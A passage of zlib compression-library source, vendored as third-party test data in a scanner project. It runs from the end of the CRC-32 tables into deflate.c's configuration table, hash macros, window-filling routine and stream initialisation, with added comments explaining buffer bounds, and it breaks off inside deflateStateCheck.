0x9e817373, 0x165a7305, 0xc2b0009e, 0xff89e5e8, 0x2b639673, 0x85fb2f05, 0x51115c9e, 0x6c28b9e8, 0xb8c2ca73, 0x7c9fb804, 0xa875cb9f, 0x954c2ee9, 0x41a65d72, 0xef3ee404, 0x3bd4979f, 0x06ed72e9, 0xd2070172, 0x5adc0104, 0x8e36729f, 0xb30f97e9, 0x67e5e472, 0xc97d5d04, 0x1d972e9f, 0x20aecbe9, 0xf444b872, 0xa8152f07, 0x7cff5c9c, 0x41c6b9ea, 0x952cca71, 0x3bb47307, 0xef5e009c, 0xd267e5ea, 0x068d9671, 0x8e569607, 0x5abce59c, 0x678500ea, 0xb36f7371, 0x1df7ca07, 0xc91db99c, 0xf4245cea, 0x20ce2f71, 0xe4935d06, 0x30792e9d, 0x0d40cbeb, 0xd9aab870, 0x77320106, 0xa3d8729d, 0x9ee197eb, 0x4a0be470, 0xc2d0e406, 0x163a979d, 0x2b0372eb, 0xffe90170, 0x5171b806, 0x859bcb9d, 0xb8a22eeb, 0x6c485d70, 0x6032940b, 0xb4d8e790, 0x89e102e6, 0x5d0b717d, 0xf393c80b, 0x2779bb90, 0x1a405ee6, 0xceaa2d7d, 0x46712d0b, 0x929b5e90, 0xafa2bbe6, 0x7b48c87d, 0xd5d0710b, 0x013a0290, 0x3c03e7e6, 0xe8e9947d, 0x2cb4e60a, 0xf85e9591, 0xc56770e7, 0x118d037c, 0xbf15ba0a, 0x6bffc991, 0x56c62ce7, 0x822c5f7c, 0x0af75f0a, 0xde1d2c91, 0xe324c9e7, 0x37ceba7c, 0x9956030a, 0x4dbc7091, 0x708595e7, 0xa46fe67c, 0xf83e7109, 0x2cd40292, 0x11ede7e4, 0xc507947f, 0x6b9f2d09, 0xbf755e92, 0x824cbbe4, 0x56a6c87f, 0xde7dc809, 0x0a97bb92, 0x37ae5ee4, 
0xe3442d7f, 0x4ddc9409, 0x9936e792, 0xa40f02e4, 0x70e5717f, 0xb4b80308, 0x60527093, 0x5d6b95e5, 0x8981e67e, 0x27195f08, 0xf3f32c93, 0xcecac9e5, 0x1a20ba7e, 0x92fbba08, 0x4611c993, 0x7b282ce5, 0xafc25f7e, 0x015ae608, 0xd5b09593, 0xe88970e5, 0x3c63037e, 0x502b5e0e, 0x84c12d95, 0xb9f8c8e3, 0x6d12bb78, 0xc38a020e, 0x17607195, 0x2a5994e3, 0xfeb3e778, 0x7668e70e, 0xa2829495, 0x9fbb71e3, 0x4b510278, 0xe5c9bb0e, 0x3123c895, 0x0c1a2de3, 0xd8f05e78, 0x1cad2c0f, 0xc8475f94, 0xf57ebae2, 0x2194c979, 0x8f0c700f, 0x5be60394, 0x66dfe6e2, 0xb2359579, 0x3aee950f, 0xee04e694, 0xd33d03e2, 0x07d77079, 0xa94fc90f, 0x7da5ba94, 0x409c5fe2, 0x94762c79, 0xc827bb0c, 0x1ccdc897, 0x21f42de1, 0xf51e5e7a, 0x5b86e70c, 0x8f6c9497, 0xb25571e1, 0x66bf027a, 0xee64020c, 0x3a8e7197, 0x07b794e1, 0xd35de77a, 0x7dc55e0c, 0xa92f2d97, 0x9416c8e1, 0x40fcbb7a, 0x84a1c90d, 0x504bba96, 0x6d725fe0, 0xb9982c7b, 0x1700950d, 0xc3eae696, 0xfed303e0, 0x2a39707b, 0xa2e2700d, 0x76080396, 0x4b31e6e0, 0x9fdb957b, 0x31432c0d, 0xe5a95f96, 0xd890bae0, 0x0c7ac97b}, {0x00000000, 0x27652581, 0x0fcc3bd9, 0x28a91e58, 0x5f9e0669, 0x78fb23e8, 0x50523db0, 0x77371831, 0xbe3c0dd2, 0x99592853, 0xb1f0360b, 0x9695138a, 0xe1a20bbb, 0xc6c72e3a, 0xee6e3062, 0xc90b15e3, 0x3d7f6b7f, 0x1a1a4efe, 0x32b350a6, 0x15d67527, 0x62e16d16, 0x45844897, 0x6d2d56cf, 0x4a48734e, 0x834366ad, 0xa426432c, 0x8c8f5d74, 0xabea78f5, 0xdcdd60c4, 0xfbb84545, 0xd3115b1d, 0xf4747e9c, 0x7afed6fe, 0x5d9bf37f, 0x7532ed27, 0x5257c8a6, 0x2560d097, 0x0205f516, 0x2aaceb4e, 0x0dc9cecf, 0xc4c2db2c, 0xe3a7fead, 0xcb0ee0f5, 0xec6bc574, 0x9b5cdd45, 0xbc39f8c4, 0x9490e69c, 0xb3f5c31d, 0x4781bd81, 0x60e49800, 0x484d8658, 0x6f28a3d9, 0x181fbbe8, 0x3f7a9e69, 0x17d38031, 0x30b6a5b0, 0xf9bdb053, 0xded895d2, 0xf6718b8a, 0xd114ae0b, 0xa623b63a, 0x814693bb, 0xa9ef8de3, 0x8e8aa862, 0xb5fadc26, 0x929ff9a7, 0xba36e7ff, 0x9d53c27e, 0xea64da4f, 0xcd01ffce, 0xe5a8e196, 0xc2cdc417, 0x0bc6d1f4, 0x2ca3f475, 0x040aea2d, 0x236fcfac, 0x5458d79d, 0x733df21c, 0x5b94ec44, 0x7cf1c9c5, 0x8885b759, 
0xafe092d8, 0x87498c80, 0xa02ca901, 0xd71bb130, 0xf07e94b1, 0xd8d78ae9, 0xffb2af68, 0x36b9ba8b, 0x11dc9f0a, 0x39758152, 0x1e10a4d3, 0x6927bce2, 0x4e429963, 0x66eb873b, 0x418ea2ba, 0xcf040ad8, 0xe8612f59, 0xc0c83101, 0xe7ad1480, 0x909a0cb1, 0xb7ff2930, 0x9f563768, 0xb83312e9, 0x7138070a, 0x565d228b, 0x7ef43cd3, 0x59911952, 0x2ea60163, 0x09c324e2, 0x216a3aba, 0x060f1f3b, 0xf27b61a7, 0xd51e4426, 0xfdb75a7e, 0xdad27fff, 0xade567ce, 0x8a80424f, 0xa2295c17, 0x854c7996, 0x4c476c75, 0x6b2249f4, 0x438b57ac, 0x64ee722d, 0x13d96a1c, 0x34bc4f9d, 0x1c1551c5, 0x3b707444, 0x6af5b94d, 0x4d909ccc, 0x65398294, 0x425ca715, 0x356bbf24, 0x120e9aa5, 0x3aa784fd, 0x1dc2a17c, 0xd4c9b49f, 0xf3ac911e, 0xdb058f46, 0xfc60aac7, 0x8b57b2f6, 0xac329777, 0x849b892f, 0xa3feacae, 0x578ad232, 0x70eff7b3, 0x5846e9eb, 0x7f23cc6a, 0x0814d45b, 0x2f71f1da, 0x07d8ef82, 0x20bdca03, 0xe9b6dfe0, 0xced3fa61, 0xe67ae439, 0xc11fc1b8, 0xb628d989, 0x914dfc08, 0xb9e4e250, 0x9e81c7d1, 0x100b6fb3, 0x376e4a32, 0x1fc7546a, 0x38a271eb, 0x4f9569da, 0x68f04c5b, 0x40595203, 0x673c7782, 0xae376261, 0x895247e0, 0xa1fb59b8, 0x869e7c39, 0xf1a96408, 0xd6cc4189, 0xfe655fd1, 0xd9007a50, 0x2d7404cc, 0x0a11214d, 0x22b83f15, 0x05dd1a94, 0x72ea02a5, 0x558f2724, 0x7d26397c, 0x5a431cfd, 0x9348091e, 0xb42d2c9f, 0x9c8432c7, 0xbbe11746, 0xccd60f77, 0xebb32af6, 0xc31a34ae, 0xe47f112f, 0xdf0f656b, 0xf86a40ea, 0xd0c35eb2, 0xf7a67b33, 0x80916302, 0xa7f44683, 0x8f5d58db, 0xa8387d5a, 0x613368b9, 0x46564d38, 0x6eff5360, 0x499a76e1, 0x3ead6ed0, 0x19c84b51, 0x31615509, 0x16047088, 0xe2700e14, 0xc5152b95, 0xedbc35cd, 0xcad9104c, 0xbdee087d, 0x9a8b2dfc, 0xb22233a4, 0x95471625, 0x5c4c03c6, 0x7b292647, 0x5380381f, 0x74e51d9e, 0x03d205af, 0x24b7202e, 0x0c1e3e76, 0x2b7b1bf7, 0xa5f1b395, 0x82949614, 0xaa3d884c, 0x8d58adcd, 0xfa6fb5fc, 0xdd0a907d, 0xf5a38e25, 0xd2c6aba4, 0x1bcdbe47, 0x3ca89bc6, 0x1401859e, 0x3364a01f, 0x4453b82e, 0x63369daf, 0x4b9f83f7, 0x6cfaa676, 0x988ed8ea, 0xbfebfd6b, 0x9742e333, 0xb027c6b2, 0xc710de83, 0xe075fb02, 0xc8dce55a, 
0xefb9c0db, 0x26b2d538, 0x01d7f0b9, 0x297eeee1, 0x0e1bcb60, 0x792cd351, 0x5e49f6d0, 0x76e0e888, 0x5185cd09}}; #endif #endif #endif local const z_crc_t FAR x2n_table[] = { 0x40000000, 0x20000000, 0x08000000, 0x00800000, 0x00008000, 0xedb88320, 0xb1e6b092, 0xa06a2517, 0xed627dae, 0x88d14467, 0xd7bbfe6a, 0xec447f11, 0x8e7ea170, 0x6427800e, 0x4d47bae0, 0x09fe548f, 0x83852d0f, 0x30362f1a, 0x7b5a9cc3, 0x31fec169, 0x9fec022a, 0x6c8dedc4, 0x15d6874d, 0x5fde7a4e, 0xbad90e37, 0x2e4e5eef, 0x4eaba214, 0xa8a472c0, 0x429a969e, 0x148d302a, 0xc40ba6d0, 0xc4e22c3c}; ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/deflate.c ================================================ /* deflate.c -- compress data using the deflation algorithm * Copyright (C) 1995-2023 Jean-loup Gailly and Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* * ALGORITHM * * The "deflation" process depends on being able to identify portions * of the input text which are identical to earlier input (within a * sliding window trailing behind the input currently being processed). * * The most straightforward technique turns out to be the fastest for * most input files: try all possible matches and select the longest. * The key feature of this algorithm is that insertions into the string * dictionary are very simple and thus fast, and deletions are avoided * completely. Insertions are performed at each input character, whereas * string matches are performed only when the previous match ends. So it * is preferable to spend more time in matches to allow very fast string * insertions and avoid deletions. The matching algorithm for small * strings is inspired from that of Rabin & Karp. A brute force approach * is used to find longer strings when a small match has been found. * A similar algorithm is used in comic (by Jan-Mark Wams) and freeze * (by Leonid Broukhis). 
* A previous version of this file used a more sophisticated algorithm * (by Fiala and Greene) which is guaranteed to run in linear amortized * time, but has a larger average cost, uses more memory and is patented. * However the F&G algorithm may be faster for some highly redundant * files if the parameter max_chain_length (described below) is too large. * * ACKNOWLEDGEMENTS * * The idea of lazy evaluation of matches is due to Jan-Mark Wams, and * I found it in 'freeze' written by Leonid Broukhis. * Thanks to many people for bug reports and testing. * * REFERENCES * * Deutsch, L.P.,"DEFLATE Compressed Data Format Specification". * Available in http://tools.ietf.org/html/rfc1951 * * A description of the Rabin and Karp algorithm is given in the book * "Algorithms" by R. Sedgewick, Addison-Wesley, p252. * * Fiala,E.R., and Greene,D.H. * Data Compression with Finite Windows, Comm.ACM, 32,4 (1989) 490-595 * */ /* @(#) $Id$ */ #include "deflate.h" const char deflate_copyright[] = " deflate 1.3 Copyright 1995-2023 Jean-loup Gailly and Mark Adler "; /* If you use the zlib library in a product, an acknowledgment is welcome in the documentation of your product. If for some reason you cannot include such an acknowledgment, I would appreciate that you keep this copyright string in the executable of your product. */ typedef enum { need_more, /* block not completed, need more input or more output */ block_done, /* block flush performed */ finish_started, /* finish started, need only more output at next deflate */ finish_done /* finish done, accept no more input or output */ } block_state; typedef block_state (*compress_func)(deflate_state *s, int flush); /* Compression function. Returns the block state after the call. 
*/
/* Forward declarations of the compression routines. configuration_table below
 * refers to deflate_stored, deflate_fast and (unless FASTEST is defined)
 * deflate_slow; deflate_rle and deflate_huff are not referenced by the table.
 */
local block_state deflate_stored(deflate_state *s, int flush);
local block_state deflate_fast(deflate_state *s, int flush);
#ifndef FASTEST
local block_state deflate_slow(deflate_state *s, int flush);
#endif
local block_state deflate_rle(deflate_state *s, int flush);
local block_state deflate_huff(deflate_state *s, int flush);

/* ===========================================================================
 * Local data
 */

#define NIL 0
/* Tail of hash chains */

#ifndef TOO_FAR
#  define TOO_FAR 4096
#endif
/* Matches of length 3 are discarded if their distance exceeds TOO_FAR */

/* Values for max_lazy_match, good_match and max_chain_length, depending on
 * the desired pack level (0..9). The values given below have been tuned to
 * exclude worst case performance for pathological files. Better values may be
 * found for specific files.
 */
typedef struct config_s {
   ush good_length; /* reduce lazy search above this match length */
   ush max_lazy;    /* do not perform lazy search above this match length */
   ush nice_length; /* quit search above this match length */
   ush max_chain;   /* presumably the max_chain_length named above -- confirm
                     * against deflate.h */
   compress_func func; /* compression routine selected for this row */
} config;

/* NOTE(review): the rows are labelled 0..9 (0..1 under FASTEST), so the table
 * is presumably indexed by compression level; the lookup itself is outside
 * this span. deflateInit2_() in this file forces level to 0 or 1 under
 * FASTEST and returns Z_STREAM_ERROR for level < 0 or level > 9, which keeps
 * such an index inside the array that is compiled in.
 */
#ifdef FASTEST
local const config configuration_table[2] = {
/*      good lazy nice chain */
/* 0 */ {0,    0,  0,    0, deflate_stored},  /* store only */
/* 1 */ {4,    4,  8,    4, deflate_fast}}; /* max speed, no lazy matches */
#else
local const config configuration_table[10] = {
/*      good lazy nice chain */
/* 0 */ {0,    0,  0,    0, deflate_stored},  /* store only */
/* 1 */ {4,    4,  8,    4, deflate_fast}, /* max speed, no lazy matches */
/* 2 */ {4,    5, 16,    8, deflate_fast},
/* 3 */ {4,    6, 32,   32, deflate_fast},

/* 4 */ {4,    4, 16,   16, deflate_slow},  /* lazy matches */
/* 5 */ {8,   16, 32,   32, deflate_slow},
/* 6 */ {8,   16, 128, 128, deflate_slow},
/* 7 */ {8,   32, 128, 256, deflate_slow},
/* 8 */ {32, 128, 258, 1024, deflate_slow},
/* 9 */ {32, 258, 258, 4096, deflate_slow}}; /* max compression */
#endif

/* Note: the deflate() code requires max_lazy >= MIN_MATCH and max_chain >= 4
 * For deflate_fast()
(levels <= 3) good is ignored and lazy has a different
 * meaning.
 */

/* rank Z_BLOCK between Z_NO_FLUSH and Z_PARTIAL_FLUSH */
/* The argument f appears twice in the expansion, so it must be free of side
 * effects.
 */
#define RANK(f) (((f) * 2) - ((f) > 4 ? 9 : 0))

/* ===========================================================================
 * Update a hash value with the given input byte
 * IN assertion: all calls to UPDATE_HASH are made with consecutive input
 *    characters, so that a running hash key can be computed from the previous
 *    key instead of complete recalculation each time.
 */
/* The result is ANDed with s->hash_mask before it is stored in h, so a value
 * produced by this macro never exceeds hash_mask. h is both read and assigned
 * and must therefore be an lvalue without side effects; s is used
 * unparenthesized and is expected to be a plain pointer name.
 */
#define UPDATE_HASH(s,h,c) (h = (((h) << s->hash_shift) ^ (c)) & s->hash_mask)


/* ===========================================================================
 * Insert string str in the dictionary and set match_head to the previous head
 * of the hash chain (the most recent string with same hash key). Return
 * the previous length of the hash chain.
 * If this file is compiled with -DFASTEST, the compression level is forced
 * to 1, and no hash chains are maintained.
 * IN assertion: all calls to INSERT_STRING are made with consecutive input
 *    characters and the first MIN_MATCH bytes of str are valid (except for
 *    the last MIN_MATCH-1 bytes of the input file).
 */
/* Indexing in both variants: head[] is indexed by s->ins_h, which UPDATE_HASH
 * has just masked with hash_mask; in the non-FASTEST variant prev[] is indexed
 * by (str) & s->w_mask. deflateInit2_() in this file allocates head with
 * hash_size entries and prev with w_size entries and sets each mask to
 * size - 1, so both indices stay inside their arrays. The window read at
 * (str) + (MIN_MATCH-1) is not checked here; it relies on the IN assertion
 * above. str is expanded more than once and must have no side effects.
 * The FASTEST variant does not write prev[] at all.
 */
#ifdef FASTEST
#define INSERT_STRING(s, str, match_head) \
   (UPDATE_HASH(s, s->ins_h, s->window[(str) + (MIN_MATCH-1)]), \
    match_head = s->head[s->ins_h], \
    s->head[s->ins_h] = (Pos)(str))
#else
#define INSERT_STRING(s, str, match_head) \
   (UPDATE_HASH(s, s->ins_h, s->window[(str) + (MIN_MATCH-1)]), \
    match_head = s->prev[(str) & s->w_mask] = s->head[s->ins_h], \
    s->head[s->ins_h] = (Pos)(str))
#endif

/* ===========================================================================
 * Initialize the hash table (avoiding 64K overflow for 16 bit systems).
 * prev[] will be initialized on the fly.
*/
/* The last entry is set to NIL by assignment and the remaining
 * hash_size - 1 entries are zeroed with zmemzero, so the byte count handed to
 * zmemzero is one element short of the full table size.
 */
#define CLEAR_HASH(s) \
    do { \
        s->head[s->hash_size - 1] = NIL; \
        zmemzero((Bytef *)s->head, \
                 (unsigned)(s->hash_size - 1)*sizeof(*s->head)); \
    } while (0)

/* ===========================================================================
 * Slide the hash table when sliding the window down (could be avoided with 32
 * bit values at the expense of memory usage). We slide even when level == 0 to
 * keep the hash table consistent if we switch back to level > 0 later.
 */
/* Every entry of head[] (hash_size entries) and, unless FASTEST is defined,
 * of prev[] (w_size entries) is rewritten: a stored position m >= w_size
 * becomes m - w_size, any smaller position becomes NIL.
 *
 * Both loops are do/while loops that decrement before testing, so they assume
 * hash_size and w_size are non-zero; deflateInit2_() in this file sets both
 * to a power of two (1 << bits).
 *
 * When the compiler reports the memory_sanitizer feature, MemorySanitizer
 * instrumentation is switched off for this function: as the comment inside
 * the prev[] loop says, entries that are on no hash chain hold garbage, and
 * this loop reads every entry regardless.
 */
#if defined(__has_feature)
#  if __has_feature(memory_sanitizer)
     __attribute__((no_sanitize("memory")))
#  endif
#endif
local void slide_hash(deflate_state *s) {
    unsigned n, m;
    Posf *p;
    uInt wsize = s->w_size;

    /* Walk head[] from its last entry down to its first. */
    n = s->hash_size;
    p = &s->head[n];
    do {
        m = *--p;
        *p = (Pos)(m >= wsize ? m - wsize : NIL);
    } while (--n);
    n = wsize;
#ifndef FASTEST
    /* Same adjustment for prev[], which has one entry per window position. */
    p = &s->prev[n];
    do {
        m = *--p;
        *p = (Pos)(m >= wsize ? m - wsize : NIL);
        /* If n is not on any hash chain, prev[n] is garbage but
         * its value will never be used.
         */
    } while (--n);
#endif
}

/* ===========================================================================
 * Read a new buffer from the current input stream, update the adler32
 * and total number of bytes read.  All deflate() input goes through
 * this function so some applications may wish to modify it to avoid
 * allocating a large strm->next_in buffer and copying from it.
 * (See also flush_pending()).
 */
/* Parameters:
 *   strm  stream whose next_in / avail_in describe the pending input
 *   buf   destination of the copy
 *   size  number of bytes the caller allows to be written at buf
 * Returns the number of bytes copied, which is min(strm->avail_in, size) and
 * may be 0.
 *
 * The copy length is clamped to size before zmemcpy runs, so this function
 * never writes more than size bytes at buf; whether size really fits the
 * destination is the caller's responsibility (fill_window() passes the free
 * space it computed for the window).
 *
 * The running check value in strm->adler is updated over exactly the bytes
 * copied: adler32 when state->wrap == 1, crc32 when state->wrap == 2 (only if
 * GZIP is defined); for any other wrap value it is left unchanged.
 */
local unsigned read_buf(z_streamp strm, Bytef *buf, unsigned size) {
    unsigned len = strm->avail_in;

    if (len > size) len = size;     /* never exceed the caller's bound */
    if (len == 0) return 0;

    strm->avail_in  -= len;

    zmemcpy(buf, strm->next_in, len);
    if (strm->state->wrap == 1) {
        strm->adler = adler32(strm->adler, buf, len);
    }
#ifdef GZIP
    else if (strm->state->wrap == 2) {
        strm->adler = crc32(strm->adler, buf, len);
    }
#endif
    /* Advance the input cursor and the running total by the bytes consumed. */
    strm->next_in  += len;
    strm->total_in += len;

    return len;
}

/* ===========================================================================
 * Fill the window when the lookahead becomes insufficient.
 * Updates strstart and lookahead.
*
 * IN  assertion: lookahead < MIN_LOOKAHEAD
 * OUT assertions: strstart <= window_size-MIN_LOOKAHEAD
 *    At least one byte has been read, or avail_in == 0; reads are
 *    performed for at least two bytes (required for the zip translate_eol
 *    option -- not supported here).
 *
 * NOTE(review): the only bound on the write into s->window is the value of
 * `more` passed to read_buf() as its size argument, so the arithmetic that
 * derives `more` from window_size, lookahead and strstart is what keeps the
 * copy inside the window allocation. Assert is defined outside this file; if
 * it expands to nothing in non-debug builds (TODO confirm in zutil.h), the
 * asserted conditions are not enforced at run time there and hold only by
 * the reasoning given in the comments.
 */
local void fill_window(deflate_state *s) {
    unsigned n;
    unsigned more;    /* Amount of free space at the end of the window. */
    uInt wsize = s->w_size;

    Assert(s->lookahead < MIN_LOOKAHEAD, "already enough lookahead");

    do {
        /* Free space after the data currently held in the window. */
        more = (unsigned)(s->window_size -(ulg)s->lookahead -(ulg)s->strstart);

        /* Deal with !@#$% 64K limit: */
        if (sizeof(int) <= 2) {
            if (more == 0 && s->strstart == 0 && s->lookahead == 0) {
                more = wsize;

            } else if (more == (unsigned)(-1)) {
                /* Very unlikely, but possible on 16 bit machine if
                 * strstart == 0 && lookahead == 1 (input done a byte at time)
                 */
                more--;
            }
        }

        /* If the window is almost full and there is insufficient lookahead,
         * move the upper half to the lower one to make room in the upper half.
         */
        if (s->strstart >= wsize + MAX_DIST(s)) {

            /* Copies (wsize - more) bytes from window + wsize down to the
             * start of the window, then rebases every stored position by
             * wsize so they keep referring to the same data.
             */
            zmemcpy(s->window, s->window + wsize, (unsigned)wsize - more);
            s->match_start -= wsize;
            s->strstart    -= wsize; /* we now have strstart >= MAX_DIST */
            s->block_start -= (long) wsize;
            /* insert is capped so that strstart - insert below cannot
             * go negative after the rebase.
             */
            if (s->insert > s->strstart)
                s->insert = s->strstart;
            slide_hash(s);
            more += wsize;
        }
        if (s->strm->avail_in == 0) break;

        /* If there was no sliding:
         *    strstart <= WSIZE+MAX_DIST-1 && lookahead <= MIN_LOOKAHEAD - 1 &&
         *    more == window_size - lookahead - strstart
         * => more >= window_size - (MIN_LOOKAHEAD-1 + WSIZE + MAX_DIST-1)
         * => more >= window_size - 2*WSIZE + 2
         * In the BIG_MEM or MMAP case (not yet supported),
         *   window_size == input_size + MIN_LOOKAHEAD  &&
         *   strstart + s->lookahead <= input_size => more >= MIN_LOOKAHEAD.
         * Otherwise, window_size == 2*WSIZE so more >= 2.
         * If there was sliding, more >= WSIZE. So in all cases, more >= 2.
         */
        Assert(more >= 2, "more < 2");

        /* read_buf() copies at most `more` bytes, starting right after the
         * data already in the window.
         */
        n = read_buf(s->strm, s->window + s->strstart + s->lookahead, more);
        s->lookahead += n;

        /* Initialize the hash value now that we have some input: */
        if (s->lookahead + s->insert >= MIN_MATCH) {
            uInt str = s->strstart - s->insert;
            s->ins_h = s->window[str];
            UPDATE_HASH(s, s->ins_h, s->window[str + 1]);
#if MIN_MATCH != 3
            Call UPDATE_HASH() MIN_MATCH-3 more times
#endif
            /* Insert the strings that were deferred (s->insert of them) now
             * that enough bytes follow each one; stop early if fewer than
             * MIN_MATCH bytes remain for the next one.
             */
            while (s->insert) {
                UPDATE_HASH(s, s->ins_h, s->window[str + MIN_MATCH-1]);
#ifndef FASTEST
                s->prev[str & s->w_mask] = s->head[s->ins_h];
#endif
                s->head[s->ins_h] = (Pos)str;
                str++;
                s->insert--;
                if (s->lookahead + s->insert < MIN_MATCH)
                    break;
            }
        }
        /* If the whole input has less than MIN_MATCH bytes, ins_h is garbage,
         * but this is not important since only literal bytes will be emitted.
         */

    } while (s->lookahead < MIN_LOOKAHEAD && s->strm->avail_in != 0);

    /* If the WIN_INIT bytes after the end of the current data have never been
     * written, then zero those bytes in order to avoid memory check reports of
     * the use of uninitialized (or uninitialised as Julian writes) bytes by
     * the longest match routines.  Update the high water mark for the next
     * time through here.  WIN_INIT is set to MAX_MATCH since the longest match
     * routines allow scanning to strstart + MAX_MATCH, ignoring lookahead.
     */
    if (s->high_water < s->window_size) {
        ulg curr = s->strstart + (ulg)(s->lookahead);
        ulg init;

        /* In both branches init is clamped to the space left in the window,
         * so neither zmemzero call writes past window + window_size.
         */
        if (s->high_water < curr) {
            /* Previous high water mark below current data -- zero WIN_INIT
             * bytes or up to end of window, whichever is less.
             */
            init = s->window_size - curr;
            if (init > WIN_INIT)
                init = WIN_INIT;
            zmemzero(s->window + curr, (unsigned)init);
            s->high_water = curr + init;
        }
        else if (s->high_water < (ulg)curr + WIN_INIT) {
            /* High water mark at or above current data, but below current data
             * plus WIN_INIT -- zero out to current data plus WIN_INIT, or up
             * to end of window, whichever is less.
             */
            init = (ulg)curr + WIN_INIT - s->high_water;
            if (init > s->window_size - s->high_water)
                init = s->window_size - s->high_water;
            zmemzero(s->window + s->high_water, (unsigned)init);
            s->high_water += init;
        }
    }

    Assert((ulg)s->strstart <= s->window_size - MIN_LOOKAHEAD,
           "not enough room for search");
}

/* ========================================================================= */
/* Convenience entry point: forwards to deflateInit2_() with method
 * Z_DEFLATED, window bits MAX_WBITS, memory level DEF_MEM_LEVEL and strategy
 * Z_DEFAULT_STRATEGY, and returns its result unchanged. strm, level, version
 * and stream_size are passed through as given.
 */
int ZEXPORT deflateInit_(z_streamp strm, int level, const char *version,
                         int stream_size) {
    return deflateInit2_(strm, level, Z_DEFLATED, MAX_WBITS, DEF_MEM_LEVEL,
                         Z_DEFAULT_STRATEGY, version, stream_size);
    /* To do: ignore strm->next_in if we use it as window */
}

/* ========================================================================= */
int ZEXPORT deflateInit2_(z_streamp strm, int level, int method,
                          int windowBits, int memLevel, int strategy,
                          const char *version, int stream_size) {
    deflate_state *s;
    int wrap = 1;
    static const char my_version[] = ZLIB_VERSION;

    if (version == Z_NULL || version[0] != my_version[0] ||
        stream_size != sizeof(z_stream)) {
        return Z_VERSION_ERROR;
    }
    if (strm == Z_NULL) return Z_STREAM_ERROR;

    strm->msg = Z_NULL;
    if (strm->zalloc == (alloc_func)0) {
#ifdef Z_SOLO
        return Z_STREAM_ERROR;
#else
        strm->zalloc = zcalloc;
        strm->opaque = (voidpf)0;
#endif
    }
    if (strm->zfree == (free_func)0)
#ifdef Z_SOLO
        return Z_STREAM_ERROR;
#else
        strm->zfree = zcfree;
#endif

#ifdef FASTEST
    if (level != 0) level = 1;
#else
    if (level == Z_DEFAULT_COMPRESSION) level = 6;
#endif

    if (windowBits < 0) { /* suppress zlib wrapper */
        wrap = 0;
        if (windowBits < -15)
            return Z_STREAM_ERROR;
        windowBits = -windowBits;
    }
#ifdef GZIP
    else if (windowBits > 15) {
        wrap = 2;       /* write gzip wrapper instead */
        windowBits -= 16;
    }
#endif
    if (memLevel < 1 || memLevel > MAX_MEM_LEVEL || method != Z_DEFLATED ||
        windowBits < 8 || windowBits > 15 || level < 0 || level > 9 ||
        strategy < 0 || strategy > Z_FIXED || (windowBits == 8 && wrap != 1)) {
        return Z_STREAM_ERROR;
    }
    if (windowBits == 8) windowBits = 9;  /*
until 256-byte window bug fixed */ s = (deflate_state *) ZALLOC(strm, 1, sizeof(deflate_state)); if (s == Z_NULL) return Z_MEM_ERROR; strm->state = (struct internal_state FAR *)s; s->strm = strm; s->status = INIT_STATE; /* to pass state test in deflateReset() */ s->wrap = wrap; s->gzhead = Z_NULL; s->w_bits = (uInt)windowBits; s->w_size = 1 << s->w_bits; s->w_mask = s->w_size - 1; s->hash_bits = (uInt)memLevel + 7; s->hash_size = 1 << s->hash_bits; s->hash_mask = s->hash_size - 1; s->hash_shift = ((s->hash_bits + MIN_MATCH-1) / MIN_MATCH); s->window = (Bytef *) ZALLOC(strm, s->w_size, 2*sizeof(Byte)); s->prev = (Posf *) ZALLOC(strm, s->w_size, sizeof(Pos)); s->head = (Posf *) ZALLOC(strm, s->hash_size, sizeof(Pos)); s->high_water = 0; /* nothing written to s->window yet */ s->lit_bufsize = 1 << (memLevel + 6); /* 16K elements by default */ /* We overlay pending_buf and sym_buf. This works since the average size * for length/distance pairs over any compressed block is assured to be 31 * bits or less. * * Analysis: The longest fixed codes are a length code of 8 bits plus 5 * extra bits, for lengths 131 to 257. The longest fixed distance codes are * 5 bits plus 13 extra bits, for distances 16385 to 32768. The longest * possible fixed-codes length/distance pair is then 31 bits total. * * sym_buf starts one-fourth of the way into pending_buf. So there are * three bytes in sym_buf for every four bytes in pending_buf. Each symbol * in sym_buf is three bytes -- two for the distance and one for the * literal/length. As each symbol is consumed, the pointer to the next * sym_buf value to read moves forward three bytes. From that symbol, up to * 31 bits are written to pending_buf. The closest the written pending_buf * bits gets to the next sym_buf symbol to read is just before the last * code is written. At that time, 31*(n - 2) bits have been written, just * after 24*(n - 2) bits have been consumed from sym_buf. sym_buf starts at * 8*n bits into pending_buf. 
(Note that the symbol buffer fills when n - 1 * symbols are written.) The closest the writing gets to what is unread is * then n + 14 bits. Here n is lit_bufsize, which is 16384 by default, and * can range from 128 to 32768. * * Therefore, at a minimum, there are 142 bits of space between what is * written and what is read in the overlain buffers, so the symbols cannot * be overwritten by the compressed data. That space is actually 139 bits, * due to the three-bit fixed-code block header. * * That covers the case where either Z_FIXED is specified, forcing fixed * codes, or when the use of fixed codes is chosen, because that choice * results in a smaller compressed block than dynamic codes. That latter * condition then assures that the above analysis also covers all dynamic * blocks. A dynamic-code block will only be chosen to be emitted if it has * fewer bits than a fixed-code block would for the same set of symbols. * Therefore its average symbol length is assured to be less than 31. So * the compressed data for a dynamic block also cannot overwrite the * symbols from which it is being constructed. */ s->pending_buf = (uchf *) ZALLOC(strm, s->lit_bufsize, 4); s->pending_buf_size = (ulg)s->lit_bufsize * 4; if (s->window == Z_NULL || s->prev == Z_NULL || s->head == Z_NULL || s->pending_buf == Z_NULL) { s->status = FINISH_STATE; strm->msg = ERR_MSG(Z_MEM_ERROR); deflateEnd (strm); return Z_MEM_ERROR; } s->sym_buf = s->pending_buf + s->lit_bufsize; s->sym_end = (s->lit_bufsize - 1) * 3; /* We avoid equality with lit_bufsize*3 because of wraparound at 64K * on 16 bit machines and because stored blocks are restricted to * 64K-1 bytes. */ s->level = level; s->strategy = strategy; s->method = (Byte)method; return deflateReset(strm); } /* ========================================================================= * Check for a valid deflate stream state. Return 0 if ok, 1 if not. 
*/
/* Rejected inputs: a null strm, a stream without zalloc or zfree, a null
 * state, a state whose back-pointer s->strm is not this strm, and a status
 * that is none of the state constants listed below. The back-pointer test is
 * what rejects a z_stream that was copied byte-for-byte from another stream
 * and still shares that stream's state.
 */
local int deflateStateCheck(z_streamp strm) {
    deflate_state *s;
    if (strm == Z_NULL ||
        strm->zalloc == (alloc_func)0 || strm->zfree == (free_func)0)
        return 1;
    s = strm->state;
    if (s == Z_NULL || s->strm != strm || (s->status != INIT_STATE &&
#ifdef GZIP
                                           s->status != GZIP_STATE &&
#endif
